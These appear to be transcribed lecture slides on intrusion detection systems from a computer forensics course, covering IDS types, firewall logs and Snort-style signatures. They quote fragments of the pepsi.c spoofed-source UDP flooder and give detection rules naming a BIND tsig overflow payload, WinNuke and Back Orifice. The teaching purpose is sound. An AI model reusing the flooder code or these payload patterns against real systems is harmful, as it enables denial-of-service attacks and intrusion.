Intrusion Detection Systems
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Transcript Intrusion Detection Systems
COEN 252 Computer Forensics
Intrusion Detection Systems
IDS Overview
Intrusion Detection System
Host based
Network based (NIDS)
System Integrity Verifiers (SIV)
Log File Monitors
Deception Systems (decoys, honeypots)
IDS Architecture
Raw packet logging
Too much traffic, hence:
Attack detection:
Attack Signatures
Can only find known attacks
Anomaly Detection
Finds deviations from normal traffic
But what is normal traffic?
IDS Architecture
Host Based Intrusion Detection
Looks for changes to critical files.
Tripwire.
Detection of change and recovery to known
good states already provided by MS Windows.
Provide this system with access control.
IDS Architecture
False positives:
Alarms are ringing, but there is no fire.
E.g.
NIDS reported login attempts.
From within the network, but from remote site.
Logs showed that logons were attempt to
access unavailable network resources.
Traced to workstations attempting to access an
antivirus software update server.
IDS Architecture
False Negatives.
Stealth scans: Traffic at slow rate.
Suspicious traffic can be legitimate:
User forgot password.
DoS attacks can be hard to distinguish from
heavy traffic
IDS Architecture
NIDS placement
NIDS limited by traffic.
Switched environments make NIDS difficult
to place.
On network perimeter:
Both sides of firewalls.
IDS Operations
Anomaly Detection
Based on statistical anomalies, compared
with
CPU utilization
Disk activity
User logins
File activity, etc.
Does not have to understand the cause.
IDS Operations
Application protocol verification
Invalid protocol behavior, such as WinNuke
WinNuke attacker sends “out-of-band” / “urgent”
data to port 139 on a Win95 system.
Unusual behavior such as DNS cache poisoning.
Simple create new logs that can then later
be correlated with other system logs to
show what happened.
IDS Example
UDP Flooding January 1999
08:10:10
08:10:10
08:10:17
08:10:17
08:10:22
08:10:22
08:10:28
08:10:28
08:10:35
08:10:35
08:10:49
08:10:49
08:11:05
08:11:05
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
bobadilla.echo
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192.210.19.198.666: udp 1024 (DF)
192.210.19.198.666: udp 426 (DF)
192.210.19.198.666: udp 1024 (DF)
192.210.19.198.666: udp 426 (DF)
192.210.19.198.666: udp 1024 (DF)
192.210.19.198.666: udp 426 (DF)
192.210.19.62.666: udp 1024 (DF)
192.210.19.62.666: udp 426 (DF)
192.210.19.198.666: udp 1024 (DF)
192.210.19.198.666: udp 426 (DF)
192.210.19.62.666: udp 1024 (DF)
192.210.19.62.666: udp 426 (DF)
192.210.19.62.666: udp 1024 (DF)
192.210.19.62.666: udp 426 (DF)
IDS Example
UDP Flooding January 1999
Example of the Pepsi UDP flood.
Send out UDP packages as fast as possible
Sends UPD packages with a spoofed return
address to an echo port (at Bobadilla).
Echo returns it to the source address.
Two systems under attack.
IDS Example
pepsi.c found on Internet
/*
* pepsi.c
* Random Source Host UDP flooder
*
* Author: [email protected]
*
* [12.25.1996]
*
* Greets To: Havok, nightmar, vira, Kage, ananda, tmw, Cheesebal, efudd,
* Capone, cph|ber, WebbeR, Shadowimg, robocod, napster, marl, eLLjAY, fLICK^
* Toasty, [shadow], [magnus] and silitek, oh and Data-T.
*
* Fuck You to: Razor1911 the bigest fucking lamers in the warez comunity,
* Yakuza for ripping my code, #cha0s on the undernet for trying to port
* it to win95, then ircOpers on efnet for being such cocksuckers
* especially prae for trying to call the fbi on me at least 5 times.
* all warez pups i don't know for ripping off honest programers.
* and Dianora for being a lesbian hoe, Srfag..err SrfRog for having an ego
* the size of california.
* AND A BIG HUGE ENORMOUS FUCK YOU TO myc, throwback, crush, asmodean, Piker,
* pireaus, A HUGE FUCKING FUCK to texas.net, and the last HUGEST FUCK IN
* INTERNET HISTORY, AMM.
*
*
* Disclaimer since i don't wanna go to jail
* - this is for educational purposes only * */
IDS Example
pepsi.c found on Internet
#define FRIEND "My christmas present to the internet Soldier"
#define VERSION "Pepsi.c v1.6"
#define DSTPORT 7
#define SRCPORT 19
#define PSIZE 1024
#define DWAIT 1
IDS Example
pepsi.c found on Internet
void usage(char *pname)
{
printf("usage:\n ");
printf("%s [-s src] [-n num] [-p size] [-d port] [-o port] [-w wait]
<dest>\n\n", pname);
printf("\t-s <src> : source where packets are comming from\n");
printf("\t-n <num> : number of UDP packets to send\n");
printf("\t-p <size> : Packet Size [Default is 1024]\n");
printf("\t-d <port> : Destination Port [Default is %.2d]\n", DSTPORT);
printf("\t-o <port> : Source Port [Default is %.2d]\n", SRCPORT);
printf("\t-w <time> : Wait time between packets [Default is 1]\n");
printf("\t<dest> : destination \n"); printf("\n");
exit(EXIT_SUCCESS);
}
IDS Example
pepsi.c found on Internet
if (srchost && *srchost)
ip->saddr = resolve(srchost);
ip->daddr = dst;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + psize);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(srcport);
udp->dest = htons(dstport);
udp->len = htons(sizeof(struct udphdr) + psize);
IDS Example
pepsi.c found on Internet
if (sendto(sen, packet, sizeof(struct iphdr) +
sizeof(struct udphdr) + psize, 0,
(struct sockaddr *) &dstaddr,
sizeof(struct sockaddr_in)) == (-1)) {
puts("[*] Error sending Packet");
perror("SendPacket");
exit(EXIT_FAILURE);
}
IDS Example
pepsi.c found on Internet
This is almost the complete code.
Default ports are defined, but can be
overwritten.
Port 666 is used by Doom game.
User input allows change from default
values.
Package is crafted.
And sent.
IDS and Firewalls
Firewalls perturb traffic:
Three way handshake is disrupted.
Firewall logs are primary evidence and
are primary method of intrusion
detectin.
IDS and Firewalls
Firewall Log
IP packet discarded from 222.168.40.21 for port
1880.
IP packet discarded from 222.168.40.21 for port
1882.
IP packet discarded from 222.168.40.21 for port
1881.
This firewall log gives us a fact, but not
enough to figure out what is happening.
Is this TCP? UDP?
IDS and Firewalls
Another log from a different vendor:
UDP packet dropped: Source 123.4.56.78,
2820, WAN – Destination 169.8.27.38
33430 LAN - - Rule 33
This entry gives us enough information:
Source port, destination port, protocol.
Traceroute from outside web server.
IDS and Firewalls
Yet another log:
Myhost kernel: IN=eth0 OUT = MAC =
00:80:80:80:98:ae:3e:32:12:45:a0
SRC=1.1.1.1 Dst=192.168.127.45 LEN=38
TOS = 0x00 PREC=0x00 TTL=1 ID=31758
PROTO=UDP SPT=32789 DPT=33433
This is another traceroute.
Best log seen.
IDS and Signatures
Signature Types
Header-based: Inspect the packet header
Pattern-matching: Match for content string
Atomic: match in a single packet
Stateful: match on reassembled packets
Protocol-based: Inspect based on RFC
Heuristic-based: Inspect based on statistics
Anomaly-based:
IDS and Signatures
Header-based:
Destination port TCP 139 and Out of Band
tcpdump “dst port 139 and tcp[13] &
0x20!=0 and tcp[18]!=0”
Detects the old WinNuke attack.
WinNuke packets go to NetBIOS ports such as
139, have an urgent flag set, and have a nonzero urgent value.
IDS and Signatures
Pattern-matching: looking for the tsig
overflow attempt.
alert udp $External_Net any -> $Home_Net 53 \
(msg: “Exploit named tsig overflow attempt”;\
content: “|80 00 07 00 00 00 00 00 01 3F 00 01 02|/bin/sh”;
Snort rule looking for a pattern for a BIND transaction
signature tsig code.
Looks for specific byte code to UDP destination port 53.
IDS and Signatures
Heuristic-based
Look for large ICMP packets
alert icmp any -> $HOME_NET (msg:\
“Large ICMP packet”; dsize > 800);
Such large ICMP packets are unusual.
IDS and Signatures
Encryption:
Back Orifice uses a simple encryption
scheme to protect its packet payload.
All BO packets start with *!*QWTY?
Barbwire uses Blowfish encryption.
Challenge for string searches.
IDS and Signatures
Fragmentation
Allows to hide attack strings.
Stateful analysis is more cumbersome.
Too Generic
Superscan:
4500 0024 c5eb 0000 6f01 a144 4201 f789
c08a 6b42 0800 fc46 0200 f9b8 0000 0000
0000 0000 0000 0000 0000 0000 0000
alert icmp !$HOME_NET any -> $ HOME_NET any (msg:
“Superscan echo”; content “|00000000000000000000|”;
itype:8; dsize: 8;)
Too many matches.
Traffic Analysis
Look for crafted packets:
Cheops uses TCP with both SYN and FIN flag set.
This is impossible in normal TCP.
Basic traffic characteristics
To, from, date, time
Information on source host
Weight or severity
Size, service, type class
Tiny fragments, e.g. generated by nMap.
Strange TTL values
Traffic Analysis
Link Graphs
A message passing from A to B generates
a link between A and B.
Links are weighted by the number of
connections.
Traffic Analysis
Link Graphs
J
D
X
A
C
B
F
G
Ping Scan
E
H
I
Traffic Analysis
Intellitactics NSM
Traffic Analysis
Short Time Profile Changes
Profile: Statistics on connections, port
spread, services, etc.